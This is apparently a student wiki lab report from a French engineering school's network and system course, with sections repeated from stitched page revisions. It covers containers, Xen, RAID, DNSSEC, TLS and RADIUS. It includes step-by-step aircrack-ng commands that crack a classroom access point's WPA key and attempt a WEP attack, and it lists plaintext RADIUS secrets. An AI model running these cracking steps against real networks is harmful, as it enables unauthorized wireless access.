dnssec-signzone -o pegase.space -k pegase-ksk db.pegase.space pegase-zsk

Enfin, il ne faut pas oublier d'incrémenter la valeur du sérial dans <code>db.pegase.conf</code> et de changer le fichier de zone dans <code>named.conf.local</code>.

zone "pegase.space" {
type master;
file "/etc/bind/db.pegase.space.signed";
allow-transfer {"none";};
};

Du coté de chez Gandi, il faut fournir les deux clefs publiques générés dans la rubrique DNSSEC en veillant à sélectionner le bon algorithme de chiffrement.

Pour attester du bon fonctionnement de DNSSEC, on pourra utiliser le site http://dnsviz.net/.

[[Fichier:pegase-dnssec.png]]

==Cassage d'une clef WPA==

L'exercice de cette sous-partie consiste à se procurer le mot de passe de la borne WiFi cracotte03. Il existe pour ce faire une suite logicielle nommée aircrack-ng spécialisée dans l'analyse des réseaux WiFi. Une fois doté d'un ordinateur équipé d'une carte WiFi, il faut commencer par noter le nom de l'interface sans-fil, ici wlp3s0.

On peut maintenant lancer la commande suivante :

airmon-ng start wlp3s0

Celle-ci a pour effet de créer une nouvelle interface (wlp3s0mon) sans-fil mais en mode moniteur, mode permettant de capturer tous les paquets d'un réseau sans-fil.

On repère ensuite le BSSID de cracotte03 ainsi que son channel.

airodump-ng wlp3s0mon

Nous sommes maintenant en mesure de récupérer les trames brutes correspondant au handshake.

airodump-ng --bssid 04:DA:D2:9C:50:52 wlp3s0mon--channel 9 --write result

Finalement, nous pouvons lancer le cassage de la clef :

aircrack-ng result-01.cap -w dico

Le fichier <code>dico</code> contient l'ensemble des possibilités des mots de passe à 8 chiffres (de 00000000 à 99999999) que va devoir essayer aircrack-ng.

'''Résultat :''' 42429904

[[Fichier:wpa-cracotte03.png]]

==Sécuriser apache2 : SSL/TLS==

===Création du certificat===

Nous commençons par un générer deux fichiers grâce à la commande

openssl req -nodes -newkey rsa:2048 -sha1 -keyout pegase.space.key -out pegase.csr

* <code>pegase.csr</code> : il s'agit d'un fichier servant à faire une demande de certificat auprès d'une autorité de certification. Il contient quelques informations personnelles ainsi que la clef publique.
* <code>pegase.space.key</code> : c'est la clef privée (à ne jamais distribuer) qui est complémentaire à celle présente dans le csr.

On peut ensuite se rendre sur Gandi afin d'acheter le certificat. Le csr sera demandé pendant la procédure puis il faudra choisir une des trois méthodes proposées pour la vérification. Nous avons choisi celle par email car il s'agit à priori de la pus rapide.

Il nous faut maintenant récupérer notre certificat depuis Gandi ainsi que le certificat intermédiaire. On déplace ensuite l'ensemble de ces clefs dans les répertoires appropriés.

/etc/ssl/certs/pegase.space.crt
/etc/ssl/private/pegase.space.key
/etc/ssl/certs/GandiStandardSSLCA2.pem

===Configuration d'apache2===

Avant toute chose, on s'assure que le module ssl est actif pour apache2.

a2enmod ssl

On se rend dans le répertoire <code>/etc/apache2/sites-enabled</code> et on modifie par exemple le fichier <code>000-default.conf</code>.

<VirtualHost *:80>
ServerName www.pegase.space
Redirect / https://www.pegase.space
</VirtualHost>

<VirtualHost _default_:443>
ServerName www.pegase.space
DocumentRoot /var/www/html
SSLEngine On
SSLCertificateFile /etc/ssl/certs/pegase.space.crt
SSLCertificateKeyFile /etc/ssl/private/pegase.space.key
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem
SSLVerifyClient None
</VirtualHost>

Le premier VirtualHost s'assure que l'utilisateur se connecte toujours en https (grâce au Redirect) et le second est justement utilisé pour l'accès en https au site.

Enfin, on redémarre le service apache2 pour que les modifications soient prises en compte.

service apache2 restart

== Serveur FreeRADIUS et WiFi WPA2-EAP ==

=== Serveur FreeRADIUS ===

Il faut avant toute chose installer FreeRADIUS sur la VM :

apt-get install freeradius

Ensuite nous allons faire en sorte de configurer un utilisateur et son mot de passe. Remarque, il est possible d'utiliser une base de données MySQL par exemple ou un serveur LDAP pour authentifier les utilisateurs. Nous ajoutons une ligne dans le fichier <code>/etc/freeradius/3.0/users</code>

pegase Cleartext-Password := "glopglop"

On continue la configuration et cette fois nous allons configurer le module EAP pour que l'authentification utilise la méthode PEAP du protocole EAP.

On se rend dans <code>/etc/freeradius/3.0/mods-enabled</code> et on modifie le paramètre <code>default_eap_type</code> comme suit :

eap{
default_eap_type = peap
}

Ensuite, dans le fichier <code>/etc/freeradius/mods-enabled/mschap</code>, il faut activer ces paramètres

use_mppe = yes
require_encryption = yes
require_strong = yes

et ajouter cette ligne :

with_ntdomain_hack = yes

Finalement, on ajoute un client dans le fichier <code>clients.conf</code>

client 192.168.0.10/32
{
secret = secretIMA5SC
shortname = bornePegase
}

Pour résumer, l'authentification sera assurée par un ensemble de protocole qui combinés forme EAP-PEAP MSCHAPv2, la méthode la plus répandue actuellement.

=== Configuration de la borne WiFi ===

Nous avons du configurer la borne WiFi commune pour ajouter notre SSID pegase et renseigner quelques informations sur notre serveur FreeRADIUS et sur le type d'authentification.

en
conf t
aaa new-model
aaa authentication login eap_group03 group radius_group03
aaa group server radius radius_group03
server 193.48.57.179 auth-port 1812 acct-port 1813
radius-server host 193.48.57.179 auth-port 1812 acct-port 1813 key secretIMA5SC
end

On peut maintenant créer notre SSID pegase dans la vlan 13 :

en
conf t
dot11 ssid pegase
vlan 13
authentication open eap eap_group03
authentication network-eap eap_group03
authentication key-management wpa
Mbssid Guest-mode
end

On configure la liaison entre l'interface WiFi dot11radio0 et la vlan 13 :

en
conf t
int dot11radio0
Mbssid
ssid pegase
encryption vlan 13 mode ciphers aes-ccm tkip

On active enfin l'encapsulation dot1Q pour notre vlan :

en
conf t
int dot11radio0.13
encapsulation dot1Q 13
end

== Cassage d'une clef WEP ==

La procédure est quasiment similaire à celle utilisée pour WPA. On crée l'interface moniteur, on écoute le réseau pour récupérer l'adresse MAC de la borne Wifi cracotte03 et enfin on écoute le trafic de la borne dans le but de récolter des vecteurs d'initialisation qui seront utilisés pour trouver la clef.

En parallèle, on vient simuler des connexions sur cracotte03 pour augmenter l'efficacité de la récolte des trames :

aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:52 wlp3s0mon

Malheureusement, nous n'avons pas réussi à recueillir suffisamment de données pour effectuer le cassage qui aurait du se faire de la sorte grâce au fichier de capture généré par airodump-ng :

aircrack-ng res.cap

=Partie TP personnelle=

==Authentification LDAP sur point d'accès==

L'objectif est de pouvoir s'authentifier auprès d'une borne point d'accès wifi Cisco à l'aide de ses identifiants Polytech. Pour se faire nous allons mettre en place un serveur RADIUS à l'aide de l'implémentation Open Source FreeRADIUS (https://github.com/FreeRADIUS). Le serveur RADIUS sert à interroger le serveur LDAP afin d'authentifier l'utilisateur et lui autoriser la connexion.

[[Fichier:radius-schema.png|400px|thumb|right|Topologie de notre réseau]]

Le serveur LDAP de l'école est situé sur la VLAN48, il a tout d'abord fallu vérifier que les machines de la VLAN50 (du bridge "StudentsInfo" des machines de TP) arrivent à accéder à celles du VLAN48. C'est bien le cas, nous arrivons bien à ping le nom de domaine ldap.polytech-lille.fr. Ainsi, nous pouvons maintenant mettre en place le serveur d'authentification sur le VLAN50.

Tout d'abord, nous allons créer une machine virtuelle sur Cordouan afin d'y mettre le serveur RADIUS. Pour se faire nous allons installer les paquets suivants :

apt-get install freeradius freeradius-ldap

On précise freeradius-ldap pour ajouter le module ldap, en effet FreeRADIUS est un serveur d'authentification qui ne gère pas que LDAP.

===Configuration du serveur RADIUS===

Pour configurer notre serveur RADIUS, on édite dans un premier temps le fichier <code>/etc/freeradius/3.0/clients.conf</code> en y ajoutant notre borne WiFi :

client borneWifi {
ipaddr = 172.26.145.111
secret = IMA5SC
}

On spécifie ensuite dans le fichier <code>users</code> que l'on souhaite authentifier les utilisateurs grâce au serveur LDAP :

DEFAULT LDAP-Group != "radius_users", Auth-Type := Reject
DEFAULT Auth-Type := LDAP
Fall-Through = 1

On décommente les lignes :

# Auth-Type LDAP {
# ldap
# }

du fichier sites-available/inner-tunnel

Finalement, on change la configuration du fichier <code>ldap</code> du dossier <code>mods-available</code> :

ldap {
server = "ldap.polytech-lille.fr"
basedn = "dc=example,dc=com"
password_attribute = "userPassword"
filter = "(uid=%{Stripped-User-Name:-%{User-Name}})"
start_tls = no
groupname_attribute = cn
groupmembership_filter = "(|(&(objectClass=GroupOfNames)(member=%{Ldap-UserDn}))(&(objectClass=GroupOfUniqueNames)(uniquemember=%{Ldap-UserDn})))"
groupmembership_attribute = radius_users
ldap_connections_number = 5
timeout = 4
timelimit = 3
net_timeout = 1
# set_auth_type = yes
}

Nous nous sommes malheureusement laissés déborder par le TP global et nous n'avons pas eu le temps de demander les informations relatives au serveur LDAP de Polytech et donc de vérifier le bon fonctionnement ou non de notre serveur FreeRADIUS.

===Configuration du point d'accès===

On commence par donner une IP à la borne et définir sa gateway :

enable
conf t
int bvi1
ip address 172.26.145.111 255.255.255.0
end

enable
conf t
ip default-gateway 172.26.145.0
end

On utilise ensuite la configuration vue plus haut pour la sécurisation et l’authentification :

en
conf t
aaa new-model
aaa authentication login eap_group03 group radius_group03
aaa group server radius radius_group03
server 172.26.145.115 auth-port 1812 acct-port 1813
radius-server host 172.26.145.115 auth-port 1812 acct-port 1813 key IMA5SC
end

On peut maintenant créer notre SSID pegase_ldap dans la vlan 50:

en
conf t
dot11 ssid pegase
vlan 50
authentication open eap eap_group03
authentication network-eap eap_group03
authentication key-management wpa
Mbssid Guest-mode
end

On configure la liaison entre l'interface WiFi dot11radio0 et la vlan 13 :

en
conf t
int dot11radio0
Mbssid
ssid pegase
encryption vlan 50 mode ciphers aes-ccm tkip

On active enfin l'encapsulation dot1Q pour notre vlan :

en
conf t
int dot11radio0.50
encapsulation dot1Q 50
end

TP système & reseau IMA2a5 2019/2020/cmds

2019-11-28T19:56:18Z

Jcabrald : Page créée avec « =Première séance= Nous allons au cours de cette première séance mettre en place un réseau de 3 conteneurs ''from scratch'' en exploitant le principe des espaces de n... »

=Première séance=

Nous allons au cours de cette première séance mettre en place un réseau de 3 conteneurs ''from scratch'' en exploitant le principe des espaces de noms pour assurer l'isolation. Un des conteneurs agira comme serveur mandataire inverse plus communément appelé ''reverse proxy'' et aura pour rôle de dispatcher les requêtes vers les deux autres conteneurs serveur web suivant le nom de domaine ciblé par l'utilisateur. Ces deux conteneurs ne seront pas accessibles directement depuis le réseau, c'est le reverse proxy qui assura la liaison entre ces deux différents réseaux.

==Création des fichiers disque des conteneurs==

On crée un fichier de 10 Gio = 10 240 * 1 Mio dont tous les octets sont égales à 0.

dd if=/dev/zero of=/home/pifou/containers/container1 bs=1024k count=10240

==Création du système de fichiers==

On associe un système de fichiers de type ext4 à notre fichier.

mkfs.ext4 /home/pifou/containers/container1

==Montage du système de fichiers==

On commence par créer les répertoires qui contiendront les ''rootfs'' montés. Dans un premier temps, on monte le système de fichiers précédemment créé dans /mnt/container1.

mkdir /mnt/container1
mkdir /mnt/container2
mkdir /mnt/container3
mount -t ext4 -o loop /home/pifou/containers/container1 /mnt/container1

==Déploiement de l'arborescence Debian==

Avant tout, on renseigne le proxy de l'école dans la variable d’environnement correspondante afin qu'on puisse télécharger les paquetages sur le miroir devuan extérieur à l'école.

export http_proxy=https://proxy.polytech-lille.fr:3128

Ensuite on utilise l'outil deboostrap dans /mnt/container1 pour créer un système Debian de base.

debootstrap --include=vim,nano,apache2 stable /mnt/container1

Puis on renseigne le fichier fstab de notre container1, il s'agit du fichier qui indique comment les systèmes de fichiers doivent être montés.

echo "proc /proc proc defaults 0 0" >> /mnt/container1/etc/fstab

Enfin, on peut démonter la partition

umount /mnt/container1

Une fois que nous avons déployé tout ce dont nous avons besoin au sein du container1 il ne reste plus qu'à dupliquer ce fichier deux fois, et on aura trois partitions utilisables pour nos conteneurs.

cp /home/pifou/containers/container1 /home/pifou/containers/container2
cp /home/pifou/containers/container1 /home/pifou/containers/container3

Ensuite on peut monter les trois systèmes de fichiers.

mount -t ext4 -o loop /home/pifou/containers/container1 /mnt/container1
mount -t ext4 -o loop /home/pifou/containers/container2 /mnt/container2
mount -t ext4 -o loop /home/pifou/containers/container3 /mnt/container3

==Configuration des interfaces réseau==

Pour l'instant, on a tout ce qu'il faut pour lancer les conteneurs, seulement ils seraient bien inutiles s'ils ne pouvaient aucunement communiquer entre eux ou avec le système hôte. C'est pourquoi on va créer dans le système hôte 4 interfaces virtuelles pour les 3 conteneurs (un conteneur aura deux interfaces virtuelles dont l'une sera dans le bridge donnant accès à internet, il s’agira de notre conteneur qui agira comme serveur mandataire inverse). On va donc créer un commutateur virtuel dans lequel on mettra les trois interfaces virtuelles vif1, vif2 et vif3 de nos trois conteneurs.

===Création du bridge===

ip link add monpetitpont type bridge

===Création des 4 interfaces virtuelles===

ip link add vif1 type veth peer name eth0@vif1
ip link add vif2 type veth peer name eth0@vif2
ip link add vif3 type veth peer name eth0@vif3
ip link add vif4 type veth peer name eth1@vif4

===Connexion des interfaces virtuelles aux commutateurs virtuels===

vif1 vif2 et vif3 sont mises dans monpetitpont, tandis que vif4 est mise dans bridge

ip link set vif1 master monpetitpont
ip link set vif2 master monpetitpont
ip link set vif3 master monpetitpont
ip link set vif4 master bridge

Il ne faut pas omettre d'activer les interfaces, sans quoi la communication serait impossible.

ip link set vif1 up
ip link set vif2 up
ip link set vif3 up
ip link set vif4 up

On pense à ajouter une adresse IP au commutateur virtuel, même si ce n'est pas obligatoire.

ip a add dev monpetitpont 192.168.1.1/24
ip link set monpetitpont down
ip link set monpetitpont up

== Lancement et configuration réseau des 3 conteneurs ==

=== Lancement des conteneurs ===

Pour ce faire, on va utiliser l’utilitaire unshare permettant de lancer des programmes avec des espaces de noms différents de ceux du parent.

unshare -n -u -p -f -m chroot /mnt/container1 /bin/sh -c "mount /proc ; /bin/bash"

On avait créé dans la partie précédente des paires d'interfaces virtuelles connectées entre elles. Les vif ont été reliés à monpetitpont, il faut maintenant connecter les autres parties aux conteneurs pour qu'ils puissent communiquer entre eux bien qu'ils aient des des espaces de noms différents. Tout ceci aura pour effet de faire apparaître une interface nommée eth0 pour chaque conteneur et une interface eth1 pour le dernier conteneur.

ip link set eth0@vif1 netns /proc/<PID_unshare_c1>/ns/net name eth0
ip link set eth0@vif2 netns /proc/<PID_unshare_c2>/ns/net name eth0
ip link set eth0@vif3 netns /proc/<PID_unshare_c3>/ns/net name eth0
ip link set eth1@vif4 netns /proc/<PID_unshare_c3>/ns/net name eth1

Les différents PID sont récupérés simplement grâce à la commande suivante.

ps aux | grep unshare

On est maintenant en mesure d'attribuer des IPs pour nos conteneurs.

ip addr add 192.168.1.2/24 dev eth0
ip addr add 192.168.1.3/24 dev eth0
ip addr add 192.168.1.4/24 dev eth0

A nouveau, il est nécessaire d'activer les interfaces eth0 de nos 3 conteneurs.

ip link set eth0 up

Nous devons mettre une adresse ip à l'interface eth1 du container3 qui se trouve dans le bridge. Pour se faire, il faut trouver une adresse ip dans le réseau 172.26.145.0/24 (on ping pour voir si une adresse est libre)

ip addr add 172.26.145.150/24 dev eth1

Nous sommes maintenant en mesure de ''pinger'' les conteneurs entre-eux mais également les machines de la salle avec le conteneur 3 et son interface eth1 dont l'autre morceau est connecté au bridge de la machine.

=Seconde séance=

==Suite de la première séance==

Nous allons créer des sous-domaines du domaine plil.space mis à notre disposition chez Gandi.

Tout d'abord nous créons une entrée de type "A" avec comme nom "durotduq.plil.space" et qui pointe vers 172.26.145.150. Ensuite, nous ajoutons deux entrées CNAME "durotduq1" et "durotduq2" avec comme valeur "durotduq". Bien qu'au final tous ces sous-domaines dirigent vers 172.26.145.150, le ''reverse proxy'' sera quand même en mesure de distinguer les requêtes entrantes et de les dispatcher vers les services concernés selon le sous-domaine.

'''''10h15 => Serveurs Web unshare OK'''''

Sur le conteneur mandataire inverse, on applique la configuration suivante dans le fichier /etc/apache2/sites-enabled/000-default.conf.

<VirtualHost *:80> 
ServerName durotduq1.plil.space
ServerAdmin webmaster@localhost 
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined 
ProxyPass / http://192.168.1.101/
ProxyPassReverse / http://192.168.1.101/
ProxyRequests Off 
</VirtualHost>

<VirtualHost *:80> 
ServerName durotduq2.plil.space
ServerAdmin webmaster@localhost 
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined 
ProxyPass / http://192.168.1.102/
ProxyPassReverse / http://192.168.1.102/
ProxyRequests Off 
</VirtualHost>

192.168.1.102 et 192.168.1.101 étant les adresses IP des conteneurs 1 et 2 dans monpetitpont. S'agissant d'adresses privées, elles sont donc non accessibles depuis l'extérieur et par conséquent toute connexion se fera par le biais du serveur mandataire inverse.

==Réalisation avec Docker==

Notre architecture de conteneurs ''from scratch'' fonctionne mais elle a l'inconvénient d'être relativement longue à installer et peu pratique. De plus, sans un minimum de scripting, les configurations ne peuvent être pérennisées. Ainsi, nous devions tout refaire à la main à chaque fois.

Dans la pratique, on préférera utiliser Docker comme système de gestion de conteneurs, car il permet d’une manière simple de manipuler et gérer les conteneurs. Il permet également que les configurations soient durables et offre la possibilité de gérer différentes version pour une même image et même de les distribuer.

Nous allons donc réaliser exactement la même architecture mais cette fois-ci à l'aide de Docker. Nous partirons sur la base d'une image Debian.

Lancement d'un conteneur Docker à partir de l'image debian

docker run -i -t debian /bin/bash

Export du proxy

export http_proxy=http://proxy.polytech-lille.fr:3218

Mise à jour de la liste des paquetages en local puis installation des paquetages vim, nano et apache2

apt-get update && apt-get install vim nano apache2

Maintenant, nous pouvons faire un commit des fichiers de ce conteneur, de cette manière, nous aurons une nouvelle image sur laquelle on pourra instancier des conteneurs.

Pour pouvoir réaliser ce commit, il faut connaitre l'identifiant du conteneur :

docker ps
docker commit 7e456 myapache2

A cet instant, nous avons une image myapache2 basée sur Debian avec les paquetages listés précédemment. La présence de cette image se vérifier avec la commande suivante.

docker images

Maintenant que nous sommes en mesure de lancer 3 conteneurs identiques contenant un serveur web Apache 2, nous créons un réseau Docker pour interconnecter les conteneurs. Sans précision de l'option --driver, il s'agit par défaut d'un bridge, ce que nous voulons.

docker network create pontpont

Nous pouvons à présent lancer les 3 conteneurs en spécifiant leur réseau d'attache et sans oublier d'exposer le port 80 du conteneur ''reverse proxy'' en le rendant accessible depuis le port 80 de la machine. Il faudra donc veiller à changer l'entrée DNS de type A avec l'IP de la zabeth (172.26.145.37).

docker run --net pontpont -i -t myapache2 /bin/bash
docker run --net pontpont -i -t myapache2 /bin/bash
docker run --net pontpont -p 80:80 -i -t myapache2 /bin/bash

La suite est très similaire à ce qui a été fait en première partie.

On repère les IPs des conteneurs 1 et 2 pour pouvoir adapter la configuration d'Apache 2 et on change la valeur de l'entrée DNS de type A durotduq.plil.space avec l'IP de la zabeth.

Le résultat final est bien évidemment identique, la solution moins formatricice certes mais plus pratique et utilisée en production.

'''''12h10 => Serveurs Web docker OK'''''

=Partie TP commune=

==Création des machines virtuelles==
Pour réaliser cette partie du TP nous avons besoin d'une machine virtuelle, nous allons la créer sur cordouan à l'aide de l'hyperviseur xen.

Nous créons donc une image qui sera la base de notre machine :

xen-create-image --hostname=pegase --ip=193.48.57.179 --netmask=255.255.255.240 --gateway=193.48.57.160 -size=10Gb --swap=128Mb --lvm=virtual

Une fois que cette image est créée, on édite le fichier de configuration /etc/xen/pegase.cfg afin de lui attribuer une interface réseau virtuelle qui sera dans le bridge IMA5sc.

vif = [ 'mac=00:16:3E:6F:37:08, bridge=IMA5sc' ]

Une fois le fichier de configuration créé, nous pouvons lancer la machine virtuelle à l'aide de la commande suivante et de son option -c permettant d'afficher la console.

xl create -c /etc/xen/pegase.cfg

Le mot de passe root était affiché à l'écran à la fin de la création de la machine virtuelle, mais il est toujours possible d'aller le récupérer dans les logs dans le fichier /var/log/xen-tools/pegase.log

==Ajout de partitions logiques==

Notre machine virtuelle fonctionne et est connectée au réseau. Pour le moment un seul volume de 10Go accueil notre système. Pour les besoins du TP, nous allons sur l'hôte (cordouan) créer deux volumes virtuels, un pour le /home et un autre pour le /var. Nous allons créer ces volumes virtuels dans le groupe de volume "virtual". Nous ajoutons également trois volumes de 1Gb afin de faire un RAID 5 logiciel dans la machine virtuelle.

lvcreate -L10G -n pegase-home virtual
lvcreate -L10G -n pegase-var virtual
lvcreate -L1G -n pegase-part1 virtual
lvcreate -L1G -n pegase-part2 virtual
lvcreate -L1G -n pegase-part3 virtual

Nous ajoutons ensuite ces volumes à notre machine virtuelle en tant que disque physique xvdb1, xvdc1, etc...

root = '/dev/xvda2 ro'
disk = [
'phy:/dev/virtual/pegase-disk,xvda2,w',
'phy:/dev/virtual/pegase-swap,xvda1,w',
'phy:/dev/virtual/Pegase-home,xvdb1,w',
'phy:/dev/virtual/Pegase-var,xvdc1,w',
'phy:/dev/virtual/pegase-part1,xvdd1,w',
'phy:/dev/virtual/pegase-part2,xvde1,w',
'phy:/dev/virtual/pegase-part3,xvdf1,w'
]

Nous pouvons maintenant redémarrer la machine et monter un système de fichier sur nos disques. On peut vérifier qu'ils existent d'ailleurs à l'aide de la commande fdisk -l.

mkfs -t ext4 xvdb1
mkfs -t ext4 xvdc1
mkfs -t ext4 xvdd1
mkfs -t ext4 xvde1
mkfs -t ext4 xvdf1

Nous ajoutons le montage du disque xvdb1 en tant que /home dans /etc/fstab

/dev/xvdb1 /home ext4 defaults 0 2

Pour le /var, il faut faire attention de ne pas perdre les données déjà existante, au risque d'avoir une machine inutilisable. Ainsi, on va venir monter temporairement le disque xvdc1 dans /mnt avant d'y déplacer l'intégralité du /var.

mount /dev/xvdc1 /mnt
mv /var/* /mnt

Une fois ceci fait, nous pouvons le rajouter dans /etc/fstab

/dev/xvdc1 /var ext4 defaults 0 2

Maintenant, intéressons nous au RAID, nous avons utilisé l'utilitaire mdadm afin de réaliser le RAID5 en logiciel. Puis nous avons formaté la partition formée par le raid avant de la monter. Puis nous créons un fichier sur cette partition.

mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvde1 /dev/xvdef1
mkfs -t ext4 /dev/md0
mount /dev/md0 /mnt
touch coucou.txt

On ajoute le /dev/md0 au /etc/fstab afin qu'il soit monté au lancement de la machine :

proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdc1 /var ext4 defaults 0 2
/dev/md0 /mnt/raid ext4 defaults 0 2

On vérifie que tous nos disques ont été correctement montés :

lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
xvda1 202:1 0 128M 0 disk [SWAP]
xvda2 202:2 0 10G 0 disk /
xvdb1 202:17 0 10G 0 disk /home
xvdc1 202:33 0 10G 0 disk /var
xvdd1 202:49 0 1G 0 disk
`-md0 9:127 0 2G 0 raid5 /mnt
xvde1 202:65 0 1G 0 disk
`-md0 9:127 0 2G 0 raid5 /mnt
xvdf1 202:81 0 1G 0 disk
`-md0 9:127 0 2G 0 raid5 /mnt

Par défaut, notre raid n'a pas de fichier de configuration, nous devons en créer un. Sans fichier de configuration, le device RAID ne sera pas forcément créé dans /dev/md0 mais dans un md aléatoire, ainsi, notre fstab plantera (car nous n'aurons pas forcément le RAID sur /dev/md0). Donc nous devons avoir un fichier de configuration qui sera persistant et chargé par le noyau durant le boot.

mdadm -Es >> /etc/mdadm.conf

Cette configuration ressemble à

cat /etc/mdadm.conf
ARRAY /dev/md/0 metadata=1.2 UUID=b28705d4:15d1703c:4cf988d8:f0d77f12 name=pegase-ansible2:0

A partir de là, nous avons une configuration persistante du raid. Le RAID 5 sera identifié au boot et monté automatiquement. Nous pouvons maintenant tester notre redondance, simulons une panne sur un des disques de notre RAID, ce qui pourrait arriver dans un cas réel.

mdadm --set-faulty /dev/md0 /dev/xvdf1
mdadm --remove /dev/xvdf1

Nous constatons que notre fichier coucou.txt est toujours présent, malgré la "perte" de l'un des disques. Cependant, il faut tout de même se dire que nous avons fait un raid logiciel sur des partitions logiques, en pratique, si on perd vraiment le disque, nous perdrons quoi qu'il arrive tous les volumes logiques. Ainsi nous faisons ça pour l'aspect éducatif.

==Chiffrement des disques RAID==

Il peut être utile pour diverses raison de chiffrer les disques afin qu'un accès non autorisé par le propriétaire soit proscrit. Pour cela nous allons utiliser l'utilitaire cryptsetup avec le format LUKS afin de chiffrer notre disque en AES-256 avec un mot de passe.

==Installation de bind et apache2==

L'objectif va être d'héberger notre propre serveur DNS grâce au logiciel bind et de vérifier son fonctionnement en hébergeant un site web avec apache2. On commence donc par installer ces deux paquets :

apt-get install apache2 bind9

==Configuration de Bind==

Pour continuer ce TP, nous avons acheté un nom de domaine (pegase.space) sur le registraire Gandi. La configuration de bind se trouve dans le répertoire <code>/etc/bind</code> dans lequel nous avons créé un fichier nommé <code>db.pegase.space</code> représentant notre zone et avec le contenu suivant :

$TTL 604800
@ IN SOA ns.pegase.space. root.pegase.space (
42 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
IN NS ns.pegase.space.
ns IN A 193.48.57.179
www IN A 193.48.57.179
@ IN A 193.48.57.179

Nous avons également modifié le fichier de configuration <code>named.conf.local</code> en ajoutant la ligne allow-transfer à "none".

zone "pegase.space" {
type master;
file "/etc/bind/db.pegase.space";
allow-transfer {"none";};
};

On peut maintenant redémarrer le service bind qui est maintenant opérationnel

service bind9 restart

Nous nous sommes ensuite rendu sur le site de Gandi sur lequel avons ajouté un Glue Record <code>ns.pegase.space</code> pointant vers l'IP de notre VM. Cet enregistrement permet la résolution du nom de notre serveur DNS qui ne peut se résoudre lui même.

On peut ensuite ajouter le serveur maître utilisé pour résoudre les adresses de notre zone pegase.space à savoir <code>ns.pegase.space</code>.

Après un certain temps, le temps que ces informations se propagent, nous étions en mesure d'obtenir l'IP de notre VM en effectuant par exemple un

host pegase.space

==Sécuriser les échanges DNS : DNSSEC==

Dans cette partie, nous allons faire en sorte de certifier à un utilisateur que l'IP qu'il reçoit dans la réponse DNS est bien celle du domaine voulu. Pour ce faire, nous allons configurer bind pour qu'il soit capable d'accepter les échanges suivant le protocole DNSSEC.

On commence naturellement par activer DNSSEC en ajoutant l'option <code>dnssec-enable yes;</code> dans le fichier <code>/etc/bind/named.conf.local</code>.

On génère deux couples de clefs (ZSK et KSK) qui permettront de chiffrer ou déchiffrer les enregistrements.

dnssec-keygen -f KSK -a RSASHA256 -b 2048 -n ZONE pegase.space
dnssec-keygen -a RSASHA256 -b 2048 -n ZONE pegase.space

Nous avons ensuite renommé ces clefs pour plus de lisibilité en <code>pegase-zsk.key</code>, <code>pegase-zsk.private</code>, <code>pegase-ksk.key</code>, <code>pegase-ksk.private</code>

On ajoute ensuite via la directive <code>include</code> nos clefs au fichier de zone <code>db.pegase.space</code>

$include /etc/bind/pegase-ksk.key
$include /etc/bind/pegase-zsk.key

Nous pouvons maintenant signer la zone :

dnssec-signzone -o pegase.space -k pegase-ksk db.pegase.space pegase-zsk

Enfin, il ne faut pas oublier d'incrémenter la valeur du sérial dans <code>db.pegase.conf</code> et de changer le fichier de zone dans <code>named.conf.local</code>.

zone "pegase.space" {
type master;
file "/etc/bind/db.pegase.space.signed";
allow-transfer {"none";};
};

Du coté de chez Gandi, il faut fournir les deux clefs publiques générés dans la rubrique DNSSEC en veillant à sélectionner le bon algorithme de chiffrement.

Pour attester du bon fonctionnement de DNSSEC, on pourra utiliser le site http://dnsviz.net/.

[[Fichier:pegase-dnssec.png]]

==Cassage d'une clef WPA==

L'exercice de cette sous-partie consiste à se procurer le mot de passe de la borne WiFi cracotte03. Il existe pour ce faire une suite logicielle nommée aircrack-ng spécialisée dans l'analyse des réseaux WiFi. Une fois doté d'un ordinateur équipé d'une carte WiFi, il faut commencer par noter le nom de l'interface sans-fil, ici wlp3s0.

On peut maintenant lancer la commande suivante :

airmon-ng start wlp3s0

Celle-ci a pour effet de créer une nouvelle interface (wlp3s0mon) sans-fil mais en mode moniteur, mode permettant de capturer tous les paquets d'un réseau sans-fil.

On repère ensuite le BSSID de cracotte03 ainsi que son channel.

airodump-ng wlp3s0mon

Nous sommes maintenant en mesure de récupérer les trames brutes correspondant au handshake.

airodump-ng --bssid 04:DA:D2:9C:50:52 wlp3s0mon--channel 9 --write result

Finalement, nous pouvons lancer le cassage de la clef :

aircrack-ng result-01.cap -w dico

Le fichier <code>dico</code> contient l'ensemble des possibilités des mots de passe à 8 chiffres (de 00000000 à 99999999) que va devoir essayer aircrack-ng.

'''Résultat :''' 42429904

[[Fichier:wpa-cracotte03.png]]

==Sécuriser apache2 : SSL/TLS==

===Création du certificat===

Nous commençons par un générer deux fichiers grâce à la commande

openssl req -nodes -newkey rsa:2048 -sha1 -keyout pegase.space.key -out pegase.csr

* <code>pegase.csr</code> : il s'agit d'un fichier servant à faire une demande de certificat auprès d'une autorité de certification. Il contient quelques informations personnelles ainsi que la clef publique.
* <code>pegase.space.key</code> : c'est la clef privée (à ne jamais distribuer) qui est complémentaire à celle présente dans le csr.

On peut ensuite se rendre sur Gandi afin d'acheter le certificat. Le csr sera demandé pendant la procédure puis il faudra choisir une des trois méthodes proposées pour la vérification. Nous avons choisi celle par email car il s'agit à priori de la pus rapide.

Il nous faut maintenant récupérer notre certificat depuis Gandi ainsi que le certificat intermédiaire. On déplace ensuite l'ensemble de ces clefs dans les répertoires appropriés.

/etc/ssl/certs/pegase.space.crt
/etc/ssl/private/pegase.space.key
/etc/ssl/certs/GandiStandardSSLCA2.pem

===Configuration d'apache2===

Avant toute chose, on s'assure que le module ssl est actif pour apache2.

a2enmod ssl

On se rend dans le répertoire <code>/etc/apache2/sites-enabled</code> et on modifie par exemple le fichier <code>000-default.conf</code>.

<VirtualHost *:80>
ServerName www.pegase.space
Redirect / https://www.pegase.space
</VirtualHost>

<VirtualHost _default_:443>
